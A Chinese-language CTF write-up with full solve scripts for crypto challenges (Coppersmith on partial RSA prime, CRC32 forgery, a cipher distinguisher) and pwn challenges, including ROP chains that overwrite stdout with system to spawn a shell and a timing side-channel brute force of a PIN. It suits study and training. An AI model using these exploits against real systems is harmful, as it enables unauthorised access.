最后一周几个有难度的题
Crypto
last_signin
也是个板子题,不过有些人存的板子没到,所以感觉有难度,毕竟这板子也不是咱自己能写出来的。
给了部分p, p是1024位给了922-101位差两头。
from Crypto.Util.number import *
flag = b'?'e = 65537
p, q = getPrime(1024), getPrime(1024)
N = p * q
gift = p&(2**923-2**101)
m = bytes_to_long(flag)
c = pow(m, e, N)print("N = ",N)
print("gift = ",gift)
print("c = ",c)N = 12055968471523053394851394038007091122809367392467691213651520944038861796011063965460456285088011754895260428814358599592032865236006733879843493164411907032292051539754520574395252298997379020268868972160297893871261713263196092380416876697472160104980015554834798949155917292189278888914003846758687215559958506116359394743135211950575060201887025032694825084104792059271584351889134811543088404952977137809673880602946974798597506721906751835019855063462460686036567578835477249909061675845157443679947730585880392110482301750827802213877643649659069945187353987713717145709188790427572582689339643628659515017749
p0 = 70561167908564543355630347620333350122607189772353278860674786406663564556557177660954135010748189302104288155939269204559421198595262277064601483770331017282701354382190472661583444774920297367889959312517009682740631673940840597651219956142053575328811350770919852725338374144
c = 2475592349689790551418951263467994503430959303317734266333382586608208775837696436139830443942890900333873206031844146782184712381952753718848109663188245101226538043101790881285270927795075893680615586053680077455901334861085349972222680322067952811365366282026756737185263105621695146050695385626656638309577087933457566501579308954739543321367741463532413790712419879733217017821099916866490928476372772542254929459218259301608413811969763001504245717637231198848196348656878611788843380115493744125520080930068318479606464623896240289381601711908759450672519228864487153103141218567551083147171385920693325876018
直接用双值copper这个双值和多值还是有些区别的,应该是作了些优化。
def bivariate(pol, XX, YY, kk=4):N = pol.parent().characteristic()f = pol.change_ring(ZZ)PR, (x, y) = f.parent().objgens()idx = [(k - i, i) for k in range(kk + 1) for i in range(k + 1)]monomials = list(map(lambda t: PR(x ** t[0] * y ** t[1]), idx))# collect the shift-polynomialsg = []for h, i in idx:if h == 0:g.append(y ** h * x ** i * N)else:g.append(y ** (h - 1) * x ** i * f)# construct lattice basisM = Matrix(ZZ, len(g))for row in range(M.nrows()):for col in range(M.ncols()):h, i = idx[col]M[row, col] = g[row][h, i] * XX ** h * YY ** i# LLLB = M.LLL()PX = PolynomialRing(ZZ, 'xs')xs = PX.gen()PY = PolynomialRing(ZZ, 'ys')ys = PY.gen()# Transform LLL-reduced vectors to polynomialsH = [(i, PR(0)) for i in range(B.nrows())]H = dict(H)for i in range(B.nrows()):for j in range(B.ncols()):H[i] += PR((monomials[j] * B[i, j]) / monomials[j](XX, YY))# Find the rootpoly1 = H[0].resultant(H[1], y).subs(x=xs)poly2 = H[0].resultant(H[2], y).subs(x=xs)poly = gcd(poly1, poly2)x_root = poly.roots()[0][0]poly1 = H[0].resultant(H[1], x).subs(y=ys)poly2 = H[0].resultant(H[2], x).subs(y=ys)poly = gcd(poly1, poly2)y_root = poly.roots()[0][0]return x_root, y_rootR.<x,y>=Zmod(N)[]
f = x*2^922 + p0 + y
x,y = bivariate(f,2^102,2^101)
p = int(f(x,y))
q = N//pbytes.fromhex(hex(pow(c, inverse_mod(65537,(p-1)*(q-1)),N))[2:])
#flag{although_11ts_norma11_tis_still_stay_dsadsa}
School of CRC32
这个题有9个人完成,我估计有一半以上是非预期的。
题目很短,随机取个值得到crc32然后要求给出20位的串,要求crc32值相等。
import secrets
from secret import flag
import zlibROUND = 100LENGTH = 20print('Extreme hard CRC32 challenge')
print('ARE YOU READY')for i in range(ROUND):print('ROUND', i, '!'*int(i/75 + 1))target = secrets.randbits(32)print('Here is my CRC32 value: ', hex(target))dat = input('Show me some data > ')raw = bytes.fromhex(dat)if zlib.crc32(raw) == target and len(raw) == LENGTH:print("GREAT")else:print("OH NO")exit()print("Congratulation! Here is your flag")
print(flag)
作misc题经常用到爆破crc32这东西并不难,难点在于这东西要100次,因为最快的hashcat 也要半小时以上,我的机子很慢,爆破1个要5分钟以上,所以这条路不通了。
搜crc32的算法,有移位、多项式和类LCG。发现这个LCG方法应该可以逆向(很少见到逆向python库函数的题,这题也算是非常新颖了)。
crc32的生成方法是用尾字节与字符异或查crc32_table然后与原crc的前3字节异或,逐个字符这样加密下去。
def crc32(binaries):crc = 0xFFFFFFFFindex = 0while index < len(binaries):crc = crc32_table[(crc & 0xFF) ^ binaries[index]] ^ (crc//256)index = index + 1return crc ^ 0xFFFFFFFF
所以爆破方法是中间相遇攻击。先正向生成16个0和2个字符的字典,然后逆向将给写的crc32值向前推这个规模是256*256也不算大,当查到字典里有时就得到了值。这样1秒就能完成一两轮。
from pwn import *
import os
from zlib import crc32 crc32_table =[
0x00000000, 0x77073096, 0xEE0E612C, 0x990951BA,
0x076DC419, 0x706AF48F, 0xE963A535, 0x9E6495A3,
0x0EDB8832, 0x79DCB8A4, 0xE0D5E91E, 0x97D2D988,
0x09B64C2B, 0x7EB17CBD, 0xE7B82D07, 0x90BF1D91,
0x1DB71064, 0x6AB020F2, 0xF3B97148, 0x84BE41DE,
0x1ADAD47D, 0x6DDDE4EB, 0xF4D4B551, 0x83D385C7,
0x136C9856, 0x646BA8C0, 0xFD62F97A, 0x8A65C9EC,
0x14015C4F, 0x63066CD9, 0xFA0F3D63, 0x8D080DF5,
0x3B6E20C8, 0x4C69105E, 0xD56041E4, 0xA2677172,
0x3C03E4D1, 0x4B04D447, 0xD20D85FD, 0xA50AB56B,
0x35B5A8FA, 0x42B2986C, 0xDBBBC9D6, 0xACBCF940,
0x32D86CE3, 0x45DF5C75, 0xDCD60DCF, 0xABD13D59,
0x26D930AC, 0x51DE003A, 0xC8D75180, 0xBFD06116,
0x21B4F4B5, 0x56B3C423, 0xCFBA9599, 0xB8BDA50F,
0x2802B89E, 0x5F058808, 0xC60CD9B2, 0xB10BE924,
0x2F6F7C87, 0x58684C11, 0xC1611DAB, 0xB6662D3D,
0x76DC4190, 0x01DB7106, 0x98D220BC, 0xEFD5102A,
0x71B18589, 0x06B6B51F, 0x9FBFE4A5, 0xE8B8D433,
0x7807C9A2, 0x0F00F934, 0x9609A88E, 0xE10E9818,
0x7F6A0DBB, 0x086D3D2D, 0x91646C97, 0xE6635C01,
0x6B6B51F4, 0x1C6C6162, 0x856530D8, 0xF262004E,
0x6C0695ED, 0x1B01A57B, 0x8208F4C1, 0xF50FC457,
0x65B0D9C6, 0x12B7E950, 0x8BBEB8EA, 0xFCB9887C,
0x62DD1DDF, 0x15DA2D49, 0x8CD37CF3, 0xFBD44C65,
0x4DB26158, 0x3AB551CE, 0xA3BC0074, 0xD4BB30E2,
0x4ADFA541, 0x3DD895D7, 0xA4D1C46D, 0xD3D6F4FB,
0x4369E96A, 0x346ED9FC, 0xAD678846, 0xDA60B8D0,
0x44042D73, 0x33031DE5, 0xAA0A4C5F, 0xDD0D7CC9,
0x5005713C, 0x270241AA, 0xBE0B1010, 0xC90C2086,
0x5768B525, 0x206F85B3, 0xB966D409, 0xCE61E49F,
0x5EDEF90E, 0x29D9C998, 0xB0D09822, 0xC7D7A8B4,
0x59B33D17, 0x2EB40D81, 0xB7BD5C3B, 0xC0BA6CAD,
0xEDB88320, 0x9ABFB3B6, 0x03B6E20C, 0x74B1D29A,
0xEAD54739, 0x9DD277AF, 0x04DB2615, 0x73DC1683,
0xE3630B12, 0x94643B84, 0x0D6D6A3E, 0x7A6A5AA8,
0xE40ECF0B, 0x9309FF9D, 0x0A00AE27, 0x7D079EB1,
0xF00F9344, 0x8708A3D2, 0x1E01F268, 0x6906C2FE,
0xF762575D, 0x806567CB, 0x196C3671, 0x6E6B06E7,
0xFED41B76, 0x89D32BE0, 0x10DA7A5A, 0x67DD4ACC,
0xF9B9DF6F, 0x8EBEEFF9, 0x17B7BE43, 0x60B08ED5,
0xD6D6A3E8, 0xA1D1937E, 0x38D8C2C4, 0x4FDFF252,
0xD1BB67F1, 0xA6BC5767, 0x3FB506DD, 0x48B2364B,
0xD80D2BDA, 0xAF0A1B4C, 0x36034AF6, 0x41047A60,
0xDF60EFC3, 0xA867DF55, 0x316E8EEF, 0x4669BE79,
0xCB61B38C, 0xBC66831A, 0x256FD2A0, 0x5268E236,
0xCC0C7795, 0xBB0B4703, 0x220216B9, 0x5505262F,
0xC5BA3BBE, 0xB2BD0B28, 0x2BB45A92, 0x5CB36A04,
0xC2D7FFA7, 0xB5D0CF31, 0x2CD99E8B, 0x5BDEAE1D,
0x9B64C2B0, 0xEC63F226, 0x756AA39C, 0x026D930A,
0x9C0906A9, 0xEB0E363F, 0x72076785, 0x05005713,
0x95BF4A82, 0xE2B87A14, 0x7BB12BAE, 0x0CB61B38,
0x92D28E9B, 0xE5D5BE0D, 0x7CDCEFB7, 0x0BDBDF21,
0x86D3D2D4, 0xF1D4E242, 0x68DDB3F8, 0x1FDA836E,
0x81BE16CD, 0xF6B9265B, 0x6FB077E1, 0x18B74777,
0x88085AE6, 0xFF0F6A70, 0x66063BCA, 0x11010B5C,
0x8F659EFF, 0xF862AE69, 0x616BFFD3, 0x166CCF45,
0xA00AE278, 0xD70DD2EE, 0x4E048354, 0x3903B3C2,
0xA7672661, 0xD06016F7, 0x4969474D, 0x3E6E77DB,
0xAED16A4A, 0xD9D65ADC, 0x40DF0B66, 0x37D83BF0,
0xA9BCAE53, 0xDEBB9EC5, 0x47B2CF7F, 0x30B5FFE9,
0xBDBDF21C, 0xCABAC28A, 0x53B39330, 0x24B4A3A6,
0xBAD03605, 0xCDD70693, 0x54DE5729, 0x23D967BF,
0xB3667A2E, 0xC4614AB8, 0x5D681B02, 0x2A6F2B94,
0xB40BBE37, 0xC30C8EA1, 0x5A05DF1B, 0x2D02EF8D]#向前爆破两字节
def get_rcrc1(cin): #cin是经过去0xFFFFFFF的res = {}for crc_tail in range(256): #last 8 bit for i,v in enumerate(crc32_table):h = cin^vif h>= 0x1000000: continue h <<=8 #高24位j = crc_tail^i #对应的字符#print(chr(j))res[h+crc_tail] = bytes([j])return res #向后爆破两字节存字典
res_f = {}
for i in range(256):for j in range(256):res_f[crc32(b'0'*16+bytes([i,j]))^0xffffffff] = bytes([i,j])def get_rcrc2(cin):cin = cin^0xffffffffres = get_rcrc1(cin) #向前1字节for k in res:res2 = get_rcrc1(k)for v in res2:if v in res_f:#found ret = res_f[v]+res2[v]+res[k]return ret #a = get_rcrc2(3984772369)
#print(b'0'*16+a)p = remote('node4.buuoj.cn', 28267)
context.log_level = 'debug'for i in range(100):p.recvuntil(b'Here is my CRC32 value: ')hash = int(p.recvline(),16)a = get_rcrc2(hash)p.sendlineafter(b'Show me some data > ', (b'0'*16+a).hex().encode())print('recv:', p.recvline())print('recv:', p.recvline())
print('recv:', p.recvline())p.interactive()
PseudoHell
一个easy,一个hard这两个是一个题,前一段时间打一个国外比赛正好就是这道题。关完全相同。5关设置的次数有变化,原来0x100多,现在改成46。原文见前几天的一篇 CSDNhttps://mp.csdn.net/mp_blog/creation/editor/133161392
原来第5关的打法是作256次把每个结果异或到一起,因为对于256的空间不相同肯定是0-255,所以异或到一起一定是0,而算法2给出的会有重值,也就得不到0。由于这里次数改少了,所以作法也作一丁点改变,就是看结果里有没有重值,有重值就是算法2。不过由于次数少,会有不成功的情况发生。50%还是有保证的。
from pwn import *p = remote('node4.buuoj.cn', 25480)
#context.log_level = 'debug'def p_query(msg, reverse=b'n'):p.sendlineafter(b"? > ", msg)p.sendlineafter(b"inverse? > ", reverse)return p.recvline().strip()#1 使用1次
p.sendlineafter(b"How many times are required to roll for solving 1? > ", b'1')
for _ in range(33):res = p_query(b'0'*32, b'n')if b'0'*16 == res[:16]:p.sendlineafter(b"coin? > ", b'0')else:p.sendlineafter(b"coin? > ", b'1')#2
p.sendlineafter(b"? > ", b'2')
for _ in range(33):res1 = p_query(b'0'*32, b'n')res2 = p_query(b'1'+b'0'*31, b'n')if res1[2:16] == res2[2:16]:p.sendlineafter(b"coin? > ", b'0')else:p.sendlineafter(b"coin? > ", b'1')print(p.recvline())
#(Only for a junior division) Good job! flag_baby = WACON2023{8c3deab3b7a89f9bc7941a201}#3
p.sendlineafter(b"? > ", b'2')
for _ in range(33):res1 = p_query(b'0'*32, b'n')res2 = p_query(b'0'*32, b'y')if res1[16:32] == res2[:16]:p.sendlineafter(b"coin? > ", b'0')else:p.sendlineafter(b"coin? > ", b'1')print(p.recvline())
#Good job! flag_easy = WACon2023{930db8b4dedb8cb86f309521011a1039}#4
p.sendlineafter(b"? > ", b'2')
for _ in range(33):res1 = p_query(b'0'*32, b'n')res1 = p_query(res1+b'0'*16, b'y')if res1 == b'0'*16:p.sendlineafter(b"coin? > ", b'0')else:p.sendlineafter(b"coin? > ", b'1')context.log_level = 'debug'#5
p.sendlineafter(b"? > ", b'48')
for _ in range(33):v = set()for i in range(48):t = bytes.fromhex(p_query(bytes([i]).hex().encode(),b'n').decode())[0]v.add(t)if len(v) == 48:p.sendlineafter(b"coin? > ", b'0')else:p.sendlineafter(b"coin? > ", b'1')print(p.recvline())
#(Only for general/global divisions) Good job! flag_hard = WACon2023{c7a47ff1646698d275602dce1355645684f743f1}
p.interactive()
PWN
planet
__int64 __fastcall main(int a1, char **a2, char **a3)
{unsigned int v4; // eaxchar s1[88]; // [rsp+20h] [rbp-60h] BYREFunsigned __int64 v6; // [rsp+78h] [rbp-8h]v6 = __readfsqword(0x28u);alarm(0x78u);printf("Passwd: ");fflush(stdout);gets((__int64)s1);if ( !strcmp(s1, "secret_passwd_anti_bad_guys") ){v4 = time(0LL);srand(v4);vuln1();vuln2();}return 0LL;
}
第1步要输入口令,但已经给了,第2步要rand值,这个可以直接用cyptes调用time(0)同步得到,然后就给shell了。不像第5周的水平
from pwn import *
from ctypes import *clibc = cdll.LoadLibrary("/home/kali/glibc/libs/2.27-3ubuntu1.6_amd64/libc-2.27.so")
#windows msvcrt.dllcontext.log_level = 'debug'#p = process('./planet')
p = remote('node4.buuoj.cn', 28146)
#gdb.attach(p, "b*0x555555555832\nc")
p.sendlineafter(b"Passwd: ", "secret_passwd_anti_bad_guys\x00")clibc.srand(clibc.time(0))
for i in range(11):print(bytes([clibc.rand()%26 +97 for _ in range(5)]))
password = bytes([clibc.rand()%26 +97 for _ in range(30)])p.sendlineafter(b"What is your next move? (Help)\n>", b'Admin\x00')
p.sendlineafter(b"Insert the secret passwd\n> ", password+b'\x00')
p.sendlineafter(b"The command to exec\n> ", b'/bin/sh\x00')p.interactive()
no_ouput
这个好像也是原题,连名字都像,不过还是有点差别,模板里的地址还是不一样的。
调用一个read以后就结束了。给了a一个read地址,意思是让修改这个位置。原来模板没给,直接改的stdout,这里给了a似乎是为了减小难度。
int __cdecl main(int argc, const char **argv, const char **envp)
{char buf[112]; // [rsp+0h] [rbp-70h] BYREFinit();read(0, buf, 0x200uLL);a = (__int64)&read;return 0;
}
高版本要调用这个错位形成的gadget ,通过ppp5+mov call+add 实现修改一个地址值的目的。
这里可以把a或者stdout的值(存的都是libc地址)修改为system
from pwn import *elf = ELF('./no_ouput')
libc = ELF('./libc-2.31.so')context(arch='amd64', log_level='debug')ret = 0x00401254
add_dword_rbp_0x3d_ebx_ret = 0x0040112c # 0: 01 5d c3 add DWORD PTR [rbp-0x3d], ebxpop_rbx_rbp_r12_r13_r14_r15_ret = 0x0040124a #__libc_csu_init
mov_call = 0x00401227bss = elf.bss(0) #stdout 给了a是read的地址,但是按模板直接打stdout也没问题
buf = elf.bss(0x40)def ret2csu(rdi=0, rsi=0, rdx=0, rbp=0xdeadbeef, addr=bss):return flat([pop_rbx_rbp_r12_r13_r14_r15_ret,0, 1, rdi, rsi, rdx, addr, mov_call,0, 0, rbp, 0, 0, 0, 0,])def add(off, addr=bss):return flat([pop_rbx_rbp_r12_r13_r14_r15_ret,off, addr + 0x3d, 0, 0, 0, 0,add_dword_rbp_0x3d_ebx_ret,])payload = b'a' * 0x78 + flat([ret,add(0x6e69622f, buf), #0x404080 /bin/sh\0add(0x0068732f, buf + 4),add(libc.sym['system'] - libc.sym['_IO_2_1_stdout_'], bss), #0x404040 修改stdout为systemret2csu(rdi=buf, addr=bss)
])#p = process('./no_ouput')
p = remote('node4.buuoj.cn', 25279)
#gdb.attach(p, "b*0x4011a7\nc")p.send(payload)p.sendline(b'cat /flag')p.interactive()
login
侧信道攻击,一直没用过,用的都是自己写shellcode的情况,当成功时进行死循环,不成功时退出,这样来判断字符是否正确。
这里有两个菜单一个是改密码要求输入6个数字的pin,另外一个是输入密码登录。显然这里是猜不出密码的,需要从6个数字爆破。
strcmp在比较字符里如果第1个不正确就直接返回,如果正确就比较下一个,所以这里会有个时间差,也就是总用时会有些区别,当运行10次或更多时就会看到不同的数字哪个正确。
一直试着不成功,最后在夜深人静的时候终于试成了。这题不好,因为网络因素会有非常大的影响导致不成功。毕竟那点时间差太小了。
from pwn import *
import time context.log_level = 'error'p = remote('node4.buuoj.cn', 25937)#
def get_bin(head):mx = 0 mv = ''for i in '0123456789':password = (head+i).ljust(6)totaltime = 0.0for _ in range(10):p.sendlineafter(b'>', b'3')p.recvuntil(b'Input code:')totaltime -= time.time()p.sendline(password.encode())v = p.recv(5)totaltime += time.time()if b'Wrong' not in v:print(password)p.sendline(b'123456')p.sendline(b'2')p.sendline(b'123456')p.sendline(b'cat flag')p.interactive()break#print(' ',i,totaltime)if totaltime> mx:mx = totaltime mv = i #print(mv,mx)return mvhead = ''
for i in range(6):head += get_bin(head)print(head)'''
┌──(kali㉿kali)-[~/ctf/1028]
└─$ py login2.py
5
55
552
5520
55208
552086new password:Welcome to very-safe system
1.Register
2.Login
3.Forget password
>Detected system has only one user:admin. Logged as 'admin'
Input password:Log in successful!!!flag{9d85e15c-7268-4710-9e39-bcc21a6ac151}
$
'''